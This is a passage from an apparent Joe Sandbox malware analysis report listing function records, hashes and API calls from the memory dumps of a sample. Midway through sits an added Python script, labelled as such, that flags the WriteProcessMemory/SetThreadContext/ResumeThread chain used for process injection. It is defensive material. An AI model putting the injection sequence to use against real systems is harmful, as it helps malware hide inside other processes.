                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: d52a0740a37b36ec5902d04a10709c84b53b16899933d9c4177dd3f9003c1583
                                        • Instruction ID: abd52796250a1d9a4bbe01e63f252ffb04ac321cb50413375e7ea019cf93fad9
                                        • Opcode Fuzzy Hash: d52a0740a37b36ec5902d04a10709c84b53b16899933d9c4177dd3f9003c1583
                                        • Instruction Fuzzy Hash: 51114C72C002198FDB10DFAAC4457EEBFF5FF88324F148429D559A7250CB78A544CBA5
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 055164DD
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 3dc5341a9f2a09f088b57cf8f2b1a2adea80d01ac7ec53952a29f376d2e30e24
                                        • Instruction ID: 4aa452aa3211c56fb8cc2f8540d6827852def7862ff25538be69c28f306ab7cc
                                        • Opcode Fuzzy Hash: 3dc5341a9f2a09f088b57cf8f2b1a2adea80d01ac7ec53952a29f376d2e30e24
                                        • Instruction Fuzzy Hash: 99114972C002198FDB10DFAAC4457EEBFF5EF88324F108429D559A7250CB78A544CBA5
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: c64ae92106e62f7d445224ae1c9b127ddd07fe7a9df0cbbd348abff0ace4955e
                                        • Instruction ID: 74ee208436af278ccb63f4dcd4551a5e11c94f6a1943a0855106a5ec879eacde
                                        • Opcode Fuzzy Hash: c64ae92106e62f7d445224ae1c9b127ddd07fe7a9df0cbbd348abff0ace4955e
                                        • Instruction Fuzzy Hash: D31146B19002488FDB20DFAAC8457DEFBF5EF88324F208829D519A7250CB75A544CB99
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 9b786297a80de371353940350d0412ea4d30faafd25794b9405357eb2e3273a5
                                        • Instruction ID: fea85a3795b491ab709bb3e0942dd222dfcceff483eed37d641c9468e99a57ba
                                        • Opcode Fuzzy Hash: 9b786297a80de371353940350d0412ea4d30faafd25794b9405357eb2e3273a5
                                        • Instruction Fuzzy Hash: C51136B1D002488FDB20DFAAC4457DEFFF5EB88324F208829D559A7250CB75A944CFA9
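The records above come from one memory dump region of process 14 (base 05510000) and together show WriteProcessMemory, Wow64SetThreadContext and ResumeThread, the API sequence used to hand execution to code written into another suspended process. The following triage script is an added example, not code from this Joe Sandbox report or from Joe Security: it parses the plain-text per-function records in this section, groups them by dump region, and flags a region that contains the whole chain. Its sample input is constructed from records on this page, trimmed to the fields it reads. The rule that the "API ID" field is the sorted CamelCase tokens of the API name with Get/Set dropped is inferred from the records shown here (MemoryProcessWrite, ContextThreadWow64, ConsoleWindow) and is an assumption, not documented Joe Sandbox behaviour.

```python
"""Triage helper for the per-function records in a Joe Sandbox execution graph.

Added example; not code from the Joe Sandbox report or from Joe Security.
It parses the plain-text records printed in this section, groups them by the
memory dump region (PID, base address) they were recovered from, and flags any
region whose functions together call WriteProcessMemory, Wow64SetThreadContext
and ResumeThread: the sequence that hands execution to code written into
another (suspended) process.  SAMPLE is constructed from records on this page,
trimmed to the fields the parser reads.
"""
import re
from collections import defaultdict

SAMPLE = """\
APIs
• WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0551641E
Memory Dump Source
• Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Instruction Fuzzy Hash: 46218C728002098FDB10CF99C845BEEBFF1FF88324F148829E559A7250CB759544CBA4
APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 055164DD
Memory Dump Source
• Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
• API ID: ContextThreadWow64
• Instruction Fuzzy Hash: 51114C72C002198FDB10DFAAC4457EEBFF5FF88324F148429D559A7250CB78A544CBA5
APIs
Memory Dump Source
• Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
• API ID: ResumeThread
• Instruction Fuzzy Hash: D31146B19002488FDB20DFAAC8457DEFBF5EF88324F208829D519A7250CB75A544CB99
APIs
• GetConsoleWindow.KERNELBASE ref: 055A6CBF
Memory Dump Source
• Source File: 0000000E.00000002.1829738306.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
• API ID: ConsoleWindow
• Instruction Fuzzy Hash: 1A1136B1D002498FDB20DFAAC4457DEFBF5EB48324F248829C459A7250CB75A544CBA5
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
• API ID:
• String ID: ,bq
• Instruction Fuzzy Hash: 64A14130B402098FCBB49A79955863E77E6AFC9701B9845E5D606CF3A8EF70CC4ACB51
"""

# "WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0551641E" or
# "GetConsoleWindow.KERNELBASE ref: 055A6CBF"
API_RE = re.compile(r"^(\w+)\.(\w+)(?:\(.*?\))?,? ref: ([0-9A-Fa-f]+)$")
# "<pid>.<stage>.<id>.<base>.<...>.sdmp, Offset: <hex>, based on PE: <bool>"
SRC_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.\d+\.([0-9A-F]{16})\..*Offset: ([0-9A-F]+), "
    r"based on PE: (true|false)$")
FIELDS = {"API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id",
          "Opcode ID": "opcode_id", "Instruction ID": "insn_id",
          "Opcode Fuzzy Hash": "opcode_fuzzy", "Snapshot File": "snapshot"}

# The "API ID" field looks like the CamelCase tokens of the API name, sorted and
# joined, with Get/Set dropped (Wow64SetThreadContext -> ContextThreadWow64).
# That stop list is inferred from the records on this page (assumption).
STOP = {"Get", "Set"}


def joe_api_id(name):
    """Normalise an API name the way the report's API ID field appears to."""
    tokens = re.findall(r"[A-Z][a-z0-9]*", name)
    return "".join(sorted(t for t in tokens if t not in STOP))


def parse_records(text):
    """Split the report text into one dict per function record."""
    records, cur = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        m = API_RE.match(line)
        if m:                                   # explicit API call with its address
            cur["apis"].append((m[1], m[2], int(m[3], 16)))
            continue
        key, _, val = line.partition(":")
        val = val.strip()
        if key == "Source File":                # which process/region the code came from
            s = SRC_RE.match(val)
            if s:
                cur.update(pid=int(s[1], 16), base=int(s[3], 16),
                           offset=int(s[4], 16), based_on_pe=(s[5] == "true"))
        elif key in FIELDS:
            cur[FIELDS[key]] = val
        elif key == "Instruction Fuzzy Hash":   # last line of every record
            cur["insn_fuzzy"] = val
            records.append(cur)
            cur = {"apis": []}
    return records


INJECTION_CHAIN = ("WriteProcessMemory", "Wow64SetThreadContext", "ResumeThread")


def find_injection_regions(records):
    """Return {(pid, base): sorted API names} for regions containing the whole chain.

    Names come from explicit API lines and, for records that only carry an
    "API ID" (like the ResumeThread ones above), from the normalised name.
    """
    seen = defaultdict(set)
    for r in records:
        if "pid" not in r:
            continue
        key = (r["pid"], r["base"])
        for name, _module, _addr in r["apis"]:
            seen[key].add(name)
        for cand in INJECTION_CHAIN:
            if r.get("api_id") == joe_api_id(cand):
                seen[key].add(cand)
    return {k: sorted(v) for k, v in seen.items() if set(INJECTION_CHAIN) <= v}


if __name__ == "__main__":
    for (pid, base), apis in find_injection_regions(parse_records(SAMPLE)).items():
        print(f"PID {pid} region {base:08X}: {', '.join(apis)}")
```

The grouping key is the dump region rather than the whole process because the same process here also holds unrelated code (the GetConsoleWindow block at 055A0000 and the string-only functions at 02BF0000); flagging on the region keeps the hit tied to the injected stub at 05510000 and its "based on PE: false" source, which is itself a hint that the code was not loaded as a module.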
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,bq
                                        • API String ID: 0-2474004448
                                        • Opcode ID: 0537796f98fd06fa63fd4fcabce0e681e7cf22a60255de8f65ccad3367045f2b
                                        • Instruction ID: 36eaf0aa09d4a9e8e5fc4729174d546c79ecd8fbc361c7d347f6392b4ea12e06
                                        • Opcode Fuzzy Hash: 0537796f98fd06fa63fd4fcabce0e681e7cf22a60255de8f65ccad3367045f2b
                                        • Instruction Fuzzy Hash: 64A14130B402098FCBB49A79955863E77E6AFC9701B9845E5D606CF3A8EF70CC4ACB51
                                        APIs
                                        • GetConsoleWindow.KERNELBASE ref: 055A6CBF
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1829738306.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_55a0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: ConsoleWindow
                                        • String ID:
                                        • API String ID: 2863861424-0
                                        • Opcode ID: 0fa7a37b330959bbcd06f4f9c17285c3722a8f7b5b6f1201151b2e0d1e4903ff
                                        • Instruction ID: 118ed886cd6f07dff1ed69b8c94d6b265c2fe4992e2a7933b9551f75ccfb5230
                                        • Opcode Fuzzy Hash: 0fa7a37b330959bbcd06f4f9c17285c3722a8f7b5b6f1201151b2e0d1e4903ff
                                        • Instruction Fuzzy Hash: 1A1136B1D002498FDB20DFAAC4457DEFBF5EB48324F248829C459A7250CB75A544CBA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d
                                        • API String ID: 0-2564639436
                                        • Opcode ID: a078072beae0e2871c45870a5b185bf23560300e153efe79b774677822ea7af1
                                        • Instruction ID: 2672d19818932deb3f067f8f0ffab0e95b1c6e3e79125ba198e3024bcd929458
                                        • Opcode Fuzzy Hash: a078072beae0e2871c45870a5b185bf23560300e153efe79b774677822ea7af1
                                        • Instruction Fuzzy Hash: 78615B70A0060A8FCB14DF59D5C09AAF7B6FF88310714C9A9DA699771AEB30F855CF90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1fea595cdf2642121d510e968dc04f448827378d84048409752e66303388a1c
                                        • Instruction ID: f8738d04e06847cffda3fe0599122824d6548b2c843d90316a3940a14f2153a5
                                        • Opcode Fuzzy Hash: f1fea595cdf2642121d510e968dc04f448827378d84048409752e66303388a1c
                                        • Instruction Fuzzy Hash: ADE24B34A40219DFDB15EBA0DD54BAE7B72FB89340F0084EADA0927398CB355D86DF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d
                                        • API String ID: 0-2564639436
                                        • Opcode ID: a2c5f8268c588e7cc558353dcdc58393c471c2ff036da1be475f13baed658118
                                        • Instruction ID: c4440a3883b91a6803fb1772ff4cd5dab8228a2e620c37d872b4b4f66fe88814
                                        • Opcode Fuzzy Hash: a2c5f8268c588e7cc558353dcdc58393c471c2ff036da1be475f13baed658118
                                        • Instruction Fuzzy Hash: 3A411874600602DFCB24CF18D580D6AB7F2FF84304B66CA98D55A9B669D734FD5ACB80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q
                                        • API String ID: 0-388095546
                                        • Opcode ID: 7407a01665835f5abaa1b88065bbfbec88ac6fcacdcb4ae0458c9f53b1c22193
                                        • Instruction ID: f54e6e80debbcccbb98a19bb2815eda04609c235aa4cbfedc910d3250ffa6545
                                        • Opcode Fuzzy Hash: 7407a01665835f5abaa1b88065bbfbec88ac6fcacdcb4ae0458c9f53b1c22193
                                        • Instruction Fuzzy Hash: C7110C39B402108FCB199B69D850A2BB7A7FFCC210314899ED506DB36AEF74DC068790
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q
                                        • API String ID: 0-1614139903
                                        • Opcode ID: 90111c5539809b7a50fa3feb0886161327f2a38c02de5a3001d805856edce204
                                        • Instruction ID: 784de63ae85c8e344ef6c34f9e9ef834e16fc87e93325ecbca12589191aa0140
                                        • Opcode Fuzzy Hash: 90111c5539809b7a50fa3feb0886161327f2a38c02de5a3001d805856edce204
                                        • Instruction Fuzzy Hash: 10F0A4353801015FC709E768E5506AF7BE7DFCA24031849AED04ACB7A5EF24EC4B8791
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q
                                        • API String ID: 0-388095546
                                        • Opcode ID: 5667981ded136572815dddb794aed3bc47f96fc65780439ca88f145898598d77
                                        • Instruction ID: 07ec8f2e1d3dfda45ccf395249f058bf9567c435de45ec4752789ffe4d9ad324
                                        • Opcode Fuzzy Hash: 5667981ded136572815dddb794aed3bc47f96fc65780439ca88f145898598d77
                                        • Instruction Fuzzy Hash: 06F06230E001098FCB84FFB8C4512AE7FF1EF85604F2045AEC508A7245DA3149468F81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq
                                        • API String ID: 0-149360118
                                        • Opcode ID: 97fcb51a2a45b69d31849c253dda4718ce613540662c20679b54d2bef8bfadbe
                                        • Instruction ID: 876f7d1cc15b0f41dcc00cc6219f4ee6c14b5569d134fc5e5cb0feae4144dac1
                                        • Opcode Fuzzy Hash: 97fcb51a2a45b69d31849c253dda4718ce613540662c20679b54d2bef8bfadbe
                                        • Instruction Fuzzy Hash: 51E0222660D2C00FD35E5778643812CBFE1DE8B10071D08EFD4C6CBA93C9281C078B16
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q
                                        • API String ID: 0-388095546
                                        • Opcode ID: fc3e59c89c9fa1c7e35b3593c6a830b5e7011af0121ce988fd72cf4d6138401a
                                        • Instruction ID: 4013ccc31ee0c960ce5afb59d69d28d540db34729bf7405c5efa1c5f80ac7a25
                                        • Opcode Fuzzy Hash: fc3e59c89c9fa1c7e35b3593c6a830b5e7011af0121ce988fd72cf4d6138401a
                                        • Instruction Fuzzy Hash: 32F01C70E4010D8FCB84FFB9D45126EBBF2FB88700F6045AAC509A7389EE3499428BD1
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 959a9e8f7f4d17460644f3844061a345d02201a19f5aa4d16868b0ad33656233
                                        • Instruction ID: b0e29901177bdcab121b6d11fcdba4403f520758a0f2cf5c0f7163dfb78cd7af
                                        • Opcode Fuzzy Hash: 959a9e8f7f4d17460644f3844061a345d02201a19f5aa4d16868b0ad33656233
                                        • Instruction Fuzzy Hash: 761238747006058FCB55DF29C584A6ABBF2FF89304B1584AAE506CB776DB31EC89CB50
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 55ee3b2e1db8282b5c57d579c5c1c0fb3045322692cd7fd5d77e3aea57ff4b84
                                        • Instruction ID: 4cf3451d7fb48892a35f2283a585c13e53ec25b8fb5e38ebea05d203d5b0be41
                                        • Opcode Fuzzy Hash: 55ee3b2e1db8282b5c57d579c5c1c0fb3045322692cd7fd5d77e3aea57ff4b84
                                        • Instruction Fuzzy Hash: C2B10231E001009FC701AB34D524AAEBFE2EF95350B4D86EAC51A9B355EE309D4ADBA0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a192788d6cb62f9d01fee4be7d4d84ff06e0df369ab48e8299af1c3514199247
                                        • Instruction ID: 32943a11fed4ecc414146a3c7b484c5807f845a6f750793e801be2134d95d24d
                                        • Opcode Fuzzy Hash: a192788d6cb62f9d01fee4be7d4d84ff06e0df369ab48e8299af1c3514199247
                                        • Instruction Fuzzy Hash: 4CB16F75A406018FC705DF28D58495ABBF2FF893107058AA9D45A8B376DB30FD8ACF90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1124400aaf9b0ab7bb31ebd46829b1c4b662e832e1ec690dce5b631ecc4dbd3b
                                        • Instruction ID: 61e7d9c6d30842706aaab20ccbc9d6298523814ec1fb997a4371c90c6a2fac52
                                        • Opcode Fuzzy Hash: 1124400aaf9b0ab7bb31ebd46829b1c4b662e832e1ec690dce5b631ecc4dbd3b
                                        • Instruction Fuzzy Hash: CF91C631A002459FDB11DF68D484BAEBBF2FF49304F0585A9E555AB3A1DB30EC49CB91
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aef27ff796044c49dfa67f7c5c23bb49c5655fccbc4e7cd1f02c3ffb9da5a6a6
                                        • Instruction ID: 99b0d2714940ea49d330d091a79d95a89cf49387d91b93adcaca609ab9effc68
                                        • Opcode Fuzzy Hash: aef27ff796044c49dfa67f7c5c23bb49c5655fccbc4e7cd1f02c3ffb9da5a6a6
                                        • Instruction Fuzzy Hash: 7FA14C346406018FCB05EF68D58495ABBF2FF893107158AA9D45A8B776DB30FD8ACF90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3fad774e60b8b448c67214d3d42de1d23e70fe6610af32534439261a9ec6a9be
                                        • Instruction ID: f143a715a35f03211639db0f25b219d9278c636cb586c1fb57834adfaeae198b
                                        • Opcode Fuzzy Hash: 3fad774e60b8b448c67214d3d42de1d23e70fe6610af32534439261a9ec6a9be
                                        • Instruction Fuzzy Hash: 60816F75B002198FCB45DF68D5849AEBBF2FF89314B1580AAE915DB361D730EC86CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07f0a34d138a5c078101bc4597e6049990e4c97f3a183a0b94c5e4d8ceec28a2
                                        • Instruction ID: f3c7751c4d308aa8bf1fd2ab20fab43170f5f1e9bd617bd3bd25c404d5b6ce5d
                                        • Opcode Fuzzy Hash: 07f0a34d138a5c078101bc4597e6049990e4c97f3a183a0b94c5e4d8ceec28a2
                                        • Instruction Fuzzy Hash: A5617D307442048FC758DB79C498A2A7BE6EFC9614B1584EAE246CB3B2CF71DC86CB50
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60aa17a0a880e7c973ede875c0c176687a12070fe75d5babfdd8ab7906e09fe1
                                        • Instruction ID: 260da783fffe1dadd31bc7c4d3af1602119c6be9e24e5888ec24a1a48599bcd0
                                        • Opcode Fuzzy Hash: 60aa17a0a880e7c973ede875c0c176687a12070fe75d5babfdd8ab7906e09fe1
                                        • Instruction Fuzzy Hash: EA614E30B006158FCB55DF69C5546AEBBF6FF8C604B1484AAD905EB369EB30DC46CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d12bb564dc09b6c36f9eaddb4c81af7430cdad68d714a039a7f800198a70d04
                                        • Instruction ID: 16b27a9b73183de2e4276c435a5f7f210497137bbfa5c4d7b594bd61ea04e0cd
                                        • Opcode Fuzzy Hash: 3d12bb564dc09b6c36f9eaddb4c81af7430cdad68d714a039a7f800198a70d04
                                        • Instruction Fuzzy Hash: C0517F75B002058FCB44DF79D58499ABBF6EF88310B1584EAD609DB361DB30EC49CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 230f42ec06758740432606286c975e0f2dd47c13f6aa4d6567ae8d2552c543f1
                                        • Instruction ID: 552b0bf9c63b6e0a4a95ff0982467db3c922ae5bfa6fcff5517e98887461e396
                                        • Opcode Fuzzy Hash: 230f42ec06758740432606286c975e0f2dd47c13f6aa4d6567ae8d2552c543f1
                                        • Instruction Fuzzy Hash: F4518D316406009FC715EB34E59866EBBE3EF86344B1489ADD0468B7A5DF35EC4ACB50
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a5b5265760f0e34b47042fdbc86a3e96a8e9e4f8c19ea44a50d4e1796c231073
                                        • Instruction ID: 809bc4a3eba1f63981f5358d81c26d9a945326e9672331b35acde5fc782a24f7
                                        • Opcode Fuzzy Hash: a5b5265760f0e34b47042fdbc86a3e96a8e9e4f8c19ea44a50d4e1796c231073
                                        • Instruction Fuzzy Hash: F54102327007418FCB25DB29D54466BBFE6EFC5354B1488AAD94A8B752DB30EC49CBA0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d2794c4df760c8bb54700ea53c3d043fa2584b126f604dc9efc0047f4f8428a
                                        • Instruction ID: 72947c1db16f29159ac42b96bddb9cf7af046c83fb21304d2dd93d10e925477f
                                        • Opcode Fuzzy Hash: 0d2794c4df760c8bb54700ea53c3d043fa2584b126f604dc9efc0047f4f8428a
                                        • Instruction Fuzzy Hash: F2415D31A002058FCB14DB58D984AAFFBF2EF84310F18C5A9D5199B365DB71ED4ACB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 53733036b02ba2c35d1c107121891e582ea800c173aa9592a85a82f865dea92a
                                        • Instruction ID: 96eaf13300a029a7aa137c018ececb870299db570c3d57922979236904d5b043
                                        • Opcode Fuzzy Hash: 53733036b02ba2c35d1c107121891e582ea800c173aa9592a85a82f865dea92a
                                        • Instruction Fuzzy Hash: FE41F6327056508FC721DB29D48095BBBF6EF8532431989FADA99CB756DB30EC09CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c8a5beb47f8a4e8369ead2318d13aa0fc69a0df347a234f1470aa4987cac7e03
                                        • Instruction ID: bb44989e0fe68dbade595457a0eed80508bbbf5b7543201552e02b5c827d36af
                                        • Opcode Fuzzy Hash: c8a5beb47f8a4e8369ead2318d13aa0fc69a0df347a234f1470aa4987cac7e03
                                        • Instruction Fuzzy Hash: 83416A316406009FC715EB34E558A2EBBE3EF89344B148A6CD04A8B7A5DF75EC4ACB90
                                        Memory Dump Source
